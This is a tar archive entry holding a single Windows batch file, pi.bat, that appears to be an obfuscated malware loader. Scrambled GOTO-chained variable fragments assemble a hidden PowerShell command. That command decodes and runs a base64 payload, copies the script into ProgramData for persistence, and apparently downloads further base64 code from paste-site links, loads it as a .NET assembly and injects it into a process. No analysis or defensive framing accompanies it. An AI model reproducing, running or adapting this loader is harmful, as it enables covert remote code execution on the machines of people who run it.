pi.bat                                                                                              000777  000000  000000  00000031371 15161726755 010357  0                                                                                                    ustar 00                                                                000000  000000                                                                                                                                                                         @echo off
GOTO ODJDSGGSKD
:FODIDONOGO
SET JDFNDFIGND=BlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADo
GOTO GNGHFGJFNI
:HJUGFIKOKF
SET GJGINDJJOG=EAbQAuAEgAbwBtAGUAZQBzACcAKQA7AA0ACgANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgA
GOTO OFGIGUDODN0
:OISOJIFKIJ
SET FIDIINDDNO=AIAAgACAAIAAgACAAIAAgACAAJABCAHkAdABlAHMAMgAgAD0AIAAnAHMAOgAvAC8AJwA7AA0A
GOTO JOGGGOONFI7
:JGGJNHGSIH
SET DJIGJFNJJN= '%~f0' -Destination 'C:\ProgramData\fkcAngi.bat' -Force -ErrorAction Silently
GOTO GDGIGGHOGF
:GFUDOGFFIN
SET NGJKNFJGIJ=uAGQAZQB4AE8AZgAoACQAZQBuAGQARgBsAGEAZwApADsADQAKACAAIAAgACAA
GOTO GIJGGUNINH
:NFGGNONDSF
SET GIOINDFDIS=B5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAb
GOTO NNOISGIJJD1
:NGFDKGDDGG
SET DJGFJINDFI=AGIAQwBsAGkAZQBuAHQAOwAgAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAg
GOTO IOJIOHFOGG5
:UGDKFGFDGF
%OFSGIKSJFG%%KDHSODDHGI%%NFJFFGJDUF%%OJGUDDINSG%%GGFFGDNJJN%%JDDDJIOIKJ%%GSFGFJOFSF%%NDIJKISIOS%%KNKJDDDKIS%%IOIOOOJGID%%DUGFFDSGOI%%NNOJOGJGNG%%GKNFFNSNII%%DKOUFFDDDN%%DJGFJINDFI%%KIDHHFGGOJ%%SGDKIISGDN%%HDNSDOGIDG%%SOFJDGFJDH%%OUFDOIJDOG%%GIJNNGDDHN%%SGJGKNFIHJ%%FIFIODDOOJ%%DDFFFDNDUF%%FNDNDIFGGO%%DONNJDDOOG%%FIDIINDDNO%%SGDNDDHNOO%%DNGDFDOKIN%%GFOUOUHDJO%%IFDOODUGUG%%FIJGJGJUNJ%%GGNUJFDONO%%JFOFNOUNIO%%GKGOOFGSDD%%DOFFNFGSUF%%IIDODGJODF%%DOHNNGINNN%%OFJGJFFJGK%%FSJUDHSING%%JNNOGDNNNI%%DGDNFDIGSH%%HUGFGOJIOF%%OIFISONSUI%%GFFSODGUOG%%ISIOFGSDND%%OFGIDJFDFI%%INDJNSKGDS%%DFNUJGONND%%SGDNFSFFGD%%DOODNDINDS%%IOGJININOD%%NDDUHDJJFS%%GOJFGSOJGK%%KDIIDGGGIJ%%GFIFONKUNJ%%GOGJNOFJGI%%IGIFDGUGJD%%DSOSJFFGGN%%OJDGOSNIGI%%GIGGDJIDDI%%NGJKNFJGIJ%%SNFJSDNNIK%%JDFNDFIGND%%NDODOJSDIF%%JIIIIIGGGN%%NDIKGGFGKS%%HJOJOKKGDH%%GSSGDOOJJI%%GGSOFGJSFS%%GIOINDFDIS%%KFUGUIDDFD%%JFGUHNFGIG%%JJGNGGNFII%%DOHOFOGJGI%%IGOISNIGUJ%%GODOGGKNJD%%NODNJSIJJD%%JHNUDNDIDD%%GJGINDJJOG%%NKFGIOUDOH%%ONGGIDGDNN%%JGUIJIFFIF%%IFNJNNFOOF%%JNSNDGJING%%GINSOOFIFG%%ODJFFDSNID%%IOGNOINGHF%%GKNGNDOHNF%%ODFHSFNGHK%%DSDINFFOIF%%INSOSFIGFN%%ODDHKFFFDJ%%DSFGUDGNKF%%GHUOIGJOGF%%UKGHKNNIJO%%NDODFHGUGN%%JJOINIIGJF%%ONOGNOGSGF%%DJIGJFNJJN%%GNDIOFNJDS%
GOTO KNNDNOOHID3
:NHJFOGOJSF
SET KDIIDGGGIJ=CAAIAAgACAAIAAgACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAaAAgAD0AIAAkAGUAbgBkAEkAbgBk
GOTO DUSFHDNGFI
:JFNNDFJNNS
SET IOGJININOD=EkAbgBkAGUAeAAgAC0AZwB0ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ACkAI
GOTO FDSOJSOODD2
:GDGIGGHOGF
SET GNDIOFNJDS=Continue"
GOTO KNNDNOOHID1
:DGDDONOFIS
SET FNDNDIFGGO=AfQA7ACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAA
GOTO JOGGGOONFI5
:SNDFNIDKOJ
SET GGFFGDNJJN=ALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzAA0ACgAgACAAIAAgACAAIAAg
GOTO FDSOJSOODD
:SNDFNIDKOJ3
SET OIFISONSUI=f#ACAAJwA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAgACQAZQBuAGQARgBsAGEAZ
GOTO SNDFNIDKOJ4
:NJGDDNIGGF
SET HJOJOKKGDH=uAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4
GOTO UOGHOSIOJI
:INIJNJNDSD
SET IFDOODUGUG=wBzACAAPQAgAEAAKAAoACQAbABmAHMAZABmAHMAZABnACAAKwAgACcAaABhAHMAdABl
GOTO DKIJGOSDOI1
:SNDFNIDKOJ7
SET INDJNSKGDS=AAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBn
GOTO SNDFNIDKOJ8
:IIGGFIDJGN
SET FIFIODDOOJ=hAHQAYwBoACAAewAgAGMAbwBuAHQAaQBuAHUAZQAgAH0AIAB9ADsAIAANAAoAIAAgACAAIAAgACAAIA
GOTO JOGGGOONFI3
:KNONNDFOSF
SET GFOUOUHDJO=CAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAbABpAG4Aa
GOTO INIJNJNDSD
:SNUFDODGJO
SET NNOJOGJGNG=HQAcgBpAG4AZwBbAF0AXQAkAGwAaQBuAGsAcwApACAADQAKACAAIAAgACAAIAAgACAAIAAgACA
GOTO IOJIOHFOGG2
:UOGHOSIOJI
SET GSSGDOOJJI=AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgA
GOTO NGNODFJNIJ
:DUSFHDNGFI
SET GFIFONKUNJ=AGUAeAAgAC0AIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwANAAoAIAAgACAAIAAgACAAIAA
GOTO ONDNFOJKDG
:IDOGDFDNID
SET OJDGOSNIGI=AbgBnAHQAaABoACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAA
GOTO DIGJOFUGGI
:DDSJFNIODJ
SET DSOSJFFGGN=pAG4AZwAoACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAAJABiAGEAcwBlADYANABMAGU
GOTO IDOGDFDNID
:SNDFNIDKOJ9
SET SGDNFSFFGD=A0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABpAGYAIAA
GOTO SHDGJJFDFO
:UFIGJNGHFI
SET JHNUDNDIDD=wBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBtAHkAcAByAG8AZwByAG
GOTO HJUGFIKOKF
:SNDFNIDKOJ0
SET JNNOGDNNNI=FQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBCAHkAdA
GOTO SNDFNIDKOJ1
:JOOGISIDDJ
SET ODDHKFFFDJ=CAAJABtAGUAdABoAG8AZAAgAD0AIAAkAHQAeQBwAGUALgBHAGUAdABNAGUAdABoAG
GOTO SDHOHUISNF
:SNDFNIDKOJ2
SET HUGFGOJIOF=IAAkAHMAdABhAHIAdABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQAnACAAKwAgACcAUwBFACcAIAA
GOTO SNDFNIDKOJ3
:GIJGGUNINH
SET SNFJSDNNIK=IAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAYwBvAG0AbQBhAG4AZABCAHkAdA
GOTO FODIDONOGO
:SHDGJJFDFO
SET DOODNDINDS=oACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGUAbgBkA
GOTO JFNNDFJNNS
:OFGIGUDODN
SET KNKJDDDKIS=bABUAHkAcABlAF0AOgA6AFQAbABzADEAMgANAAoAIAAgACAAIAAgACAAIAAgACA
GOTO ODIDNNSDIG
:SNDFNIDKOJ4
SET GFFSODGUOG=wAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAIAAkAHMAdA
GOTO SNDFNIDKOJ5
:ODJDSGGSKD
SET OFSGIKSJFG=%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\powershell.exe -Command "Start-Pro
GOTO IOJIOHFOGG
:SDHOHUISNF
SET DSFGUDGNKF=8AZAAoACcAcgB1AG4AcwAnACAAKwAgACcAcwAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1
GOTO ODIDNNSDIG4
:JOGGGOONFI
SET NFJFFGJDUF=owStyle Hidden -ArgumentList '-Command \"$ddsdgo = ''DQAKACAAIA
GOTO DKIJGOSDOI
:SFIFDODSGG
SET OFJGJFFJGK=JABuAHUAbABsACkAIAB7ACAAJABpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFM
GOTO DKIJGOSDOI9
:JOGGGOONFI3
SET DDFFFDNDUF=AgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAJABuAHUAbABsACA
GOTO DGDDONOFIS
:DGNFFNSIDD
SET JFGUHNFGIG=CkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQ
GOTO NNOISGIJJD3
:OFGIGUDODN7
SET IOGNOINGHF=hAG0ALwBzAGQAYQBlAGgALwBzAGYAZQByAC8AdABpAGIAdQB0AHMALwA1ADIAbQBhAGsAagBtAC8AbQ
GOTO OFGIGUDODN8
:OFGIGUDODN9
SET ODFHSFNGHK=vAC8AOgBzAGcAcwBmAGYAcwBmACcAIAA7ACAAJABnAGcAIAA9ACAAJABnAGcALgBTAHUAYgB
GOTO ODIDNNSDIG0
:JOGGGOONFI0
SET GIJNNGDDHN=QBuAGsAcwApACAAewAgAHQAcgB5ACAAewAgAHIAZQB0AHUAcgBuACAAJAB3AGUAYgBDAGwAaQBlAG
GOTO JOGGGOONFI1
:OFGIGUDODN2
SET JGUIJIFFIF=sAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADUAIAB8ACAARgBvAHIAbQB
GOTO OFGIGUDODN3
:KNNDNOOHID
SET DUGFFDSGOI=ABEAGEAdABhAEYAcgBvAG0ATABpAG4AawBzACAAewAgAHAAYQByAGEAbQAgACgAWwBzA
GOTO SNUFDODGJO
:OFGIGUDODN8
SET GKNGNDOHNF=BvAGMALgB0AG4AZQB0AG4AbwBjAHIAZQBzAHUAYgB1AGgAdABpAGcALgB3AGEAcgA
GOTO OFGIGUDODN9
:UGKGIFODDI
SET DOHNNGINNN=AIAAgACAAIABpAGYAIAAoACQAaQBtAGEAZwBlAEIAeQB0AGUAcwAgAC0AbgBlACAA
GOTO SFIFDODSGG
:OFGIGUDODN0
SET NKFGIOUDOH=CAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAAfAAgAFMAbwByAHQALQBPAGIAa
GOTO OFGIGUDODN1
:DGNFONNFOU
SET DOFFNFGSUF=AA9ACAARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEARgByAG8AbQBMAGkAbgBf#AHMAIAAkAG
GOTO GIDDSFDFSI
:OFFFOSGJOD
SET JFOFNOUNIO=kAVQA5AEIAZQB6AEsASAAnACkAKQA7ACAAIAAgACAAIAAgACAAIAANAAoAIAAg
GOTO DKIJGOSDOI4
:OJOOJFGFDS
SET DOHOFOGJGI=ABVACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATw
GOTO DDKJDIFGUJ
:OFGIGUDODN4
SET JNSNDGJING=CAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAbgBqAGUAYwA9ACcAUgBlA
GOTO OFGIGUDODN5
:ONDNFOJKDG
SET GOGJNOFJGI=gACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAGEAcwBlADYANABDAG8AbQBtAGE
GOTO FDSOJSOODD7
:OFGIGUDODN6
SET ODJFFDSNID=AIAAgACAAIAAgACAAIAAgACQAZwBnACAAPQAgACcAbgBuAGQAZAAvAG4AaQB
GOTO OFGIGUDODN7
:DDKJDIFGUJ
SET IGOISNIGUJ=BiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADUAIAB8ACAARgBvAHIAbQBhAHQ
GOTO IDHODIOGNJ
:OFGIGUDODN5
SET GINSOOFIFG=GcAJwAgACsAIAAnAEEAcwBtACcAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACA
GOTO OFGIGUDODN6
:UIGOOOIDGS
SET NDIKGGFGKS=BlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACAAIAAgACQAZQB
GOTO NJGDDNIGGF
:OFGIGUDODN1
SET ONGGIDGDNN=gBlAGMAdAAgAEMAUABVACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQB
GOTO OFGIGUDODN2
:JOGGGOONFI8
SET DNGDFDOKIN=AAPQAgACAAJABCAHkAdABlAHMAIAAf#ACQAQgB5AHQAZQBzADIAOwANAAoAIAAgA
GOTO KNONNDFOSF
:GIDDSFDFSI
SET IIDODGJODF=wAaQBuAGsAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACA
GOTO UGKGIFODDI
:IDHODIOGNJ
SET GODOGGKNJD=ALQBUAGEAYgBsAGUAIABOAGEAbQBlACwAQwBQAFUADQAKACAAIAAgACAAIAAgACAAIAAgA
GOTO IGOGGJDJDG
:NGNODFJNIJ
SET GGSOFGJSFS=CAAIAAgACAAIAAgACAAIAAgACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUw
GOTO NFGGNONDSF
:DKIJGOSDOI
SET OJGUDDINSG=AgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABTAHQAYQByAHQ
GOTO SNDFNIDKOJ
:DKIJGOSDOI9
SET FSJUDHSING=AeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVA
GOTO SNDFNIDKOJ0
:ODIDNNSDIG
SET IOIOOOJGID=AIAAgACAAIAAgACAAIAAgACAAIAAgAGYAdQBuAGMAdABpAG8AbgAgAEQAbwB3AG4AbABvAGEAZ
GOTO KNNDNOOHID
:DIGJOFUGGI
SET GIGGDJIDDI=kAGUAbgBkAEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQB
GOTO GFUDOGFFIN
:FOIJGINDII
SET OUFDOIJDOG=GUAYQBjAGgAIAAoACQAbABpAG4AawAgAGkAbgAgACQAcwBoAHUAZgBmAGwAZQBkAEwAa
GOTO JOGGGOONFI0
:JOGGGOONFI1
SET SGJGKNFIHJ=4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABsAGkAbgBf#ACkAIAB9ACAAYwB
GOTO IIGGFIDJGN
:DKIJGOSDOI2
SET GGNUJFDONO=AZABmAHMAZABnACAAKwAgACcAaABhAHMAdABlAGIALgBpAG4ALwAxAHYAVQBDAE8AUwBMAG
GOTO OFFFOSGJOD
:IOJIOHFOGG
SET KDHSODDHGI=cess %SYSTEMROOT%\System32\WindowsPowerShell\v1.0\powershell.exe -Wind
GOTO JOGGGOONFI
:GNGHFGJFNI
SET NDODOJSDIF=ARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBv
GOTO DOGSOONNGO
:IOJIOHFOGG3
SET DKOUFFDDDN=AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBl
GOTO NGFDKGDDGG
:JOGGGOONFI7
SET SGDNDDHNOO=CgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAbABmAHMAZABmAHMAZABnAC
GOTO JOGGGOONFI8
:SNDFNIDKOJ1
SET DGDNFDIGSH=BlAHMAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAA
GOTO SNDFNIDKOJ2
:ODIDNNSDIG4
SET GHUOIGJOGF=AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJABnAGcAIAAsACcAMQAnACwAIAAn
GOTO ODIDNNSDIG5
:DKIJGOSDOI1
SET FIJGJGJUNJ=AGIALgBpAG4ALwBPAHgAMABLADYAUQBZAHgAQQBWAEoANABoADYAZwAnACkALAAoACQAbABmAHM
GOTO DKIJGOSDOI2
:IGOGGJDJDG
SET NODNJSIJJD=CAAIAAgACAAIAAgACAAIAAgACAAIAAkAHQAeQBwAGUAIAA9ACAAJABsAG8AYQBkAGUAZABBAHMAc
GOTO UFIGJNGHFI
:ODIDNNSDIG0
SET DSDINFFOIF=zAHQAcgBpAG4AZwAoADAALAAgACQAZwBnAC4ATABlAG4AZwB0AGgAIAAtACAANgAp
GOTO ODIDNNSDIG1
:KNNDNOOHID1
                      
GOTO UGDKFGFDGF
:JOGGGOONFI5
SET DONNJDDOOG=IAAkAEIAeQB0AGUAcwAgAD0AIAAnAGgAdAB0AHAAJwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACA
GOTO OISOJIFKIJ
:SNDFNIDKOJ6
SET OFGIDJFDFI=AKAAkAHMAdABhAHIAdABGAGwAYQBnACkAOwAgAA0ACgAgACAAIAAgACAAIAAgAC
GOTO SNDFNIDKOJ7
:DOGSOONNGO
SET JIIIIIGGGN=AG0AbQBhAG4AZAApADsAIAAgACAAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVA
GOTO UIGOOOIDGS
:SNDFNIDKOJ5
SET ISIOFGSDND=BhAHIAdABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGY
GOTO SNDFNIDKOJ6
:OFGIGUDODN3
SET IFNJNNFOOF=hAHQALQBUAGEAYgBsAGUAIABOAGEAbQBlACwAQwBQAFUADQAKACAAIAAgACAAIAAgA
GOTO OFGIGUDODN4
:IOJIOHFOGG7
SET HDNSDOGIDG=QBDAG8AdQBuAHQAIAAkAGwAaQBuAGsAcwAuAEwAZQBuAGcAdABoADsAIAANAAoAI
GOTO IOJIOHFOGG8
:ODIDNNSDIG6
SET NDODFHGUGN=AgACcAeAA4ADYAJwApACkAfQB9AA=='';$oWjfdsuxd = [system.Text.enco
GOTO ODIDNNSDIG7
:NNOISGIJJD
SET NDIJKISIOS=gBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8A
GOTO OFGIGUDODN
:ODIDNNSDIG7
SET JJOINIIGJF=ding]::Unicode.GetString([system.convert]::Frombase64string([regex]::Repl
GOTO ODIDNNSDIG8
:NNOISGIJJD3
SET JJGNGGNFII=BQAHIAbwBjAGUAcwBzACAAfAAgAFMAbwByAHQALQBPAGIAagBlAGMAdAAgAEMAU
GOTO OJOOJFGFDS
:DKIJGOSDOI4
SET GKGOOFGSDD=ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAI
GOTO DGNFONNFOU
:ODIDNNSDIG5
SET UKGHKNNIJO=AGYAawBjAEEAbgBnAGkAJwAsACAAJABpAG4AagBlAGMALAAgACcAMAAnACAALA
GOTO ODIDNNSDIG6
:FDSOJSOODD
SET JDDDJIOIKJ=ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAU
GOTO SGOODONNDI
:FDSOJSOODD7
SET IGIFDGUGJD=AbgBkACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBTAHUAYgBzAHQAcgB
GOTO DDSJFNIODJ
:ODIDNNSDIG1
SET INSOSFIGFN=AA0ACgAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgA
GOTO JOOGISIDDJ
:SGOODONNDI
SET GSFGFJOFSF=ABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAc
GOTO NNOISGIJJD
:NNOISGIJJD1
SET KFUGUIDDFD=AB5AF0AOgA6AEwAbwBhAGQAKAAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzA
GOTO DGNFFNSIDD
:FDSOJSOODD3
SET GOJFGSOJGK=wAuAEwAZQBuAGcAdABoADsAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgA
GOTO NHJFOGOJSF
:IOJIOHFOGG2
SET GKNFFNSNII=AIAAgACAAIAAgACAAIAAgACAAIAAkAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAg
GOTO IOJIOHFOGG3
:IOJIOHFOGG5
SET KIDHHFGGOJ=ACAAIAAgACAAIAAgACAAJABzAGgAdQBmAGYAbABlAGQATABpAG4AawBzACAAPQAgAEcAZQB0AC0AU
GOTO IOJIOHFOGG6
:IOJIOHFOGG6
SET SGDKIISGDN=gBhAG4AZABvAG0AIAAtAEkAbgBwAHUAdABPAGIAagBlAGMAdAAgACQAbABpAG4AawBzACAAL
GOTO IOJIOHFOGG7
:SNDFNIDKOJ8
SET DFNUJGONND=AGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7A
GOTO SNDFNIDKOJ9
:FDSOJSOODD2
SET NDDUHDJJFS=AB7ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAAJABzAHQAYQByAHQARgBsAGEAZ
GOTO FDSOJSOODD3
:ODIDNNSDIG8
SET ONOGNOGSGF=ace($ddsdgo, ''f#'', ''r'')));iex $oWjfdsuxd\"'";  Copy-Item -Path
GOTO JGGJNHGSIH
:IOJIOHFOGG8
SET SOFJDGFJDH=AAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGYAbwByA
GOTO FOIJGINDII
:KNNDNOOHID3                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       
